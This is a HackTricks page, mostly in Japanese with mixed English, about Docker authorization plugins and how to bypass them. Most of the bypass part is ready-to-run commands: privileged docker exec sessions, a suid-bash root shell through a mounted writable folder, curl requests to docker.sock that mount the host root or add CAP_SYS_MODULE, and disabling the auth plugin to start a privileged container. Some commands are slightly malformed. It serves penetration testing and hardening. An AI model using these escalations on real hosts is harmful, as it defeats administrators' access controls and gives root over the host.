AuthZ& AuthN - Docker Access Authorization Plugin

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Dockerの標準認可モデルは全か無かです。Dockerデーモンにアクセスする権限を持つユーザーは、任意のDockerクライアントコマンドを実行できます。DockerのエンジンAPIを使用してデーモンに接続する呼び出し元についても同様です。より高いアクセス制御が必要な場合は、認可プラグインを作成し、Dockerデーモンの設定に追加できます。認可プラグインを使用することで、Docker管理者はDockerデーモンへのアクセスを管理するための詳細なアクセスポリシーを設定できます。

基本アーキテクチャ

Docker Authプラグインは、外部のプラグインであり、ユーザーと要求されたアクションに応じて、Dockerデーモンに対するアクションを許可/拒否するために使用できます。

以下の情報はドキュメントからのものです

HTTP リクエストがCLIまたはエンジンAPIを介してDocker デーモンに送信されると、認証 サブシステムはリクエストをインストールされた認証 プラグインに渡します。リクエストにはユーザー（呼び出し元）とコマンドコンテキストが含まれています。プラグインは、リクエストを許可するか拒否するかを決定する責任があります。

以下のシーケンス図は、許可と拒否の認可フローを示しています：

プラグインに送信される各リクエストには、認証されたユーザー、HTTPヘッダー、およびリクエスト/レスポンスボディが含まれます。ユーザー名と使用された認証方法のみがプラグインに渡されます。最も重要なことは、ユーザーの 資格情報やトークンは渡されないことです。最後に、すべてのリクエスト/レスポンスボディが認可プラグインに送信されるわけではありません。Content-Typeがtext/*またはapplication/jsonであるリクエスト/レスポンスボディのみが送信されます。

HTTP接続をハイジャックする可能性のあるコマンド（HTTP Upgrade）については、execのように、認可プラグインは最初のHTTPリクエストに対してのみ呼び出されます。プラグインがコマンドを承認すると、その後のフローには認可が適用されません。具体的には、ストリーミングデータは認可プラグインに渡されません。logsやeventsのようにチャンク化されたHTTPレスポンスを返すコマンドについては、HTTPリクエストのみが認可プラグインに送信されます。

リクエスト/レスポンス処理中に、一部の認可フローはDockerデーモンに追加のクエリを行う必要がある場合があります。そのようなフローを完了するために、プラグインは通常のユーザーと同様にデーモンAPIを呼び出すことができます。これらの追加クエリを有効にするために、プラグインは管理者が適切な認証とセキュリティポリシーを設定できる手段を提供する必要があります。

複数のプラグイン

あなたは、Dockerデーモンの起動の一部としてプラグインを登録する責任があります。複数のプラグインをインストールし、連鎖させることができます。この連鎖は順序付けることができます。デーモンへの各リクエストは、順番にチェーンを通過します。すべてのプラグインがリソースへのアクセスを許可したときのみ、アクセスが許可されます。

プラグインの例

Twistlock AuthZ Broker

プラグインauthzを使用すると、リクエストを認可するためにプラグインが読み取るシンプルなJSON**ファイルを作成できます。したがって、どのAPIエンドポイントが各ユーザーに到達できるかを非常に簡単に制御する機会を提供します。

これは、アリスとボブが新しいコンテナを作成できるようにする例です：{"name":"policy_3","users":["alice","bob"],"actions":["container_create"]}

ページroute_parser.goでは、要求されたURLとアクションの関係を見つけることができます。ページtypes.goでは、アクション名とアクションの関係を見つけることができます。

シンプルなプラグインチュートリアル

インストールとデバッグに関する詳細情報を含む理解しやすいプラグインをこちらで見つけることができます：https://github.com/carlospolop-forks/authobot

READMEとplugin.goのコードを読んで、どのように機能しているかを理解してください。

Docker Auth Plugin Bypass

アクセスの列挙

確認すべき主な点は、どのエンドポイントが許可されているかとどのHostConfigの値が許可されているかです。

この列挙を行うには、ツールhttps://github.com/carlospolop/docker_auth_profilerを使用できます。

許可されていない `run --privileged`

最小権限

docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

コンテナを実行し、その後特権セッションを取得する

この場合、sysadminはユーザーがボリュームをマウントし、--privilegedフラグを使用してコンテナを実行することを禁止したり、コンテナに追加の権限を与えたりしました：

docker run -d --privileged modified-ubuntu
docker: Error response from daemon: authorization denied by plugin customauth: [DOCKER FIREWALL] Specified Privileged option value is Disallowed.
See 'docker run --help'.

しかし、ユーザーは実行中のコンテナ内にシェルを作成し、追加の権限を与えることができます:

docker run -d --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu
#bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de

# Now you can run a shell with --privileged
docker exec -it privileged bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de bash
# With --cap-add=ALL
docker exec -it ---cap-add=ALL bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4 bash
# With --cap-add=SYS_ADMIN
docker exec -it ---cap-add=SYS_ADMIN bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4 bash

Now, the user can escape from the container using any of the previously discussed techniques and 権限を昇格させる inside the host.

書き込み可能なフォルダーをマウント

In this case the sysadmin ユーザーが --privileged フラグを使用してコンテナを実行することを禁止した or give any extra capability to the container, and he only allowed to mount the /tmp folder:

host> cp /bin/bash /tmp #Cerate a copy of bash
host> docker run -it -v /tmp:/host ubuntu:18.04 bash #Mount the /tmp folder of the host and get a shell
docker container> chown root:root /host/bash
docker container> chmod u+s /host/bash
host> /tmp/bash
-p #This will give you a shell as root

注意してください、/tmp フォルダーをマウントできないかもしれませんが、別の書き込み可能なフォルダーをマウントできます。書き込み可能なディレクトリを見つけるには、find / -writable -type d 2>/dev/null を使用してください。

Linuxマシンのすべてのディレクトリが suid ビットをサポートするわけではありません！ suid ビットをサポートするディレクトリを確認するには、mount | grep -v "nosuid" を実行してください。例えば、通常 /dev/shm、/run、/proc、/sys/fs/cgroup、および /var/lib/lxcfs は suid ビットをサポートしていません。

また、/etc または 設定ファイルを含む他のフォルダー を マウントできる 場合、ホストで 悪用するために それらを変更することができ、特権を昇格させることができます（おそらく /etc/shadow を変更することによって）。

チェックされていない API エンドポイント

このプラグインを設定する sysadmin の責任は、各ユーザーがどのアクションをどの特権で実行できるかを制御することです。したがって、管理者がエンドポイントと属性に対して ブラックリスト アプローチを取ると、攻撃者が 特権を昇格させる 可能性のある いくつかを忘れてしまう かもしれません。

Docker API を確認するには https://docs.docker.com/engine/api/v1.40/#

チェックされていない JSON 構造

ルートのバインド

sysadmin が Docker ファイアウォールを設定したときに、API の "Binds" のような 重要なパラメータ を 忘れてしまった 可能性があります。次の例では、この誤設定を悪用して、ホストのルート (/) フォルダーをマウントするコンテナを作成して実行することができます：

docker version #First, find the API version of docker, 1.40 in this example
docker images #List the images available
#Then, a container that mounts the root folder of the host
curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "Binds":["/:/host"]}' http:/v1.40/containers/create
docker start f6932bc153ad #Start the created privileged container
docker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it
#You can access the host filesystem

この例では、Binds パラメータをJSONのルートレベルキーとして使用していますが、APIでは**HostConfig**キーの下に表示されることに注意してください。

HostConfigのBinds

ルートのBindsと同じ指示に従い、このリクエストをDocker APIに対して実行します:

curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Binds":["/:/host"]}}' http:/v1.40/containers/create

Mounts in root

Binds in rootと同様の指示に従い、Docker APIにこのrequestを実行します:

curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}' http:/v1.40/containers/create

Mounts in HostConfig

Binds in rootと同様の指示に従い、Docker APIにこのリクエストを実行します:

curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "HostConfig":{"Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}}' http:/v1.40/containers/cre

チェックされていないJSON属性

sysadminがdockerファイアウォールを設定した際に、APIの「Capabilities」のようなパラメータの重要な属性を忘れた可能性があります。次の例では、この誤設定を悪用してSYS_MODULE権限を持つコンテナを作成して実行することが可能です：

docker version
curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Capabilities":["CAP_SYS_MODULE"]}}' http:/v1.40/containers/create
docker start c52a77629a9112450f3dedd1ad94ded17db61244c4249bdfbd6bb3d581f470fa
docker ps
docker exec -it c52a77629a91 bash
capsh --print
#You can abuse the SYS_MODULE capability

HostConfig は、通常、コンテナから脱出するための 興味深い 特権を含むキーです。しかし、前述のように、これの外で Binds を使用することも機能し、制限を回避できる可能性があることに注意してください。

プラグインの無効化

もし sysadmin が プラグイン を 無効にする 能力を 禁止するのを忘れた 場合、これを利用して完全に無効にすることができます！

docker plugin list #Enumerate plugins

# If you don’t have access to enumerate the plugins you can see the name of the plugin in the error output:
docker: Error response from daemon: authorization denied by plugin authobot:latest: use of Privileged containers is not allowed.
# "authbolt" is the name of the previous plugin

docker plugin disable authobot
docker run --rm -it --privileged -v /:/host ubuntu bash
docker plugin enable authobot

Remember to 再度プラグインを有効にすることを忘れないでください, or a dockerサービスの再起動は機能しません!

Auth Plugin Bypass writeups

https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/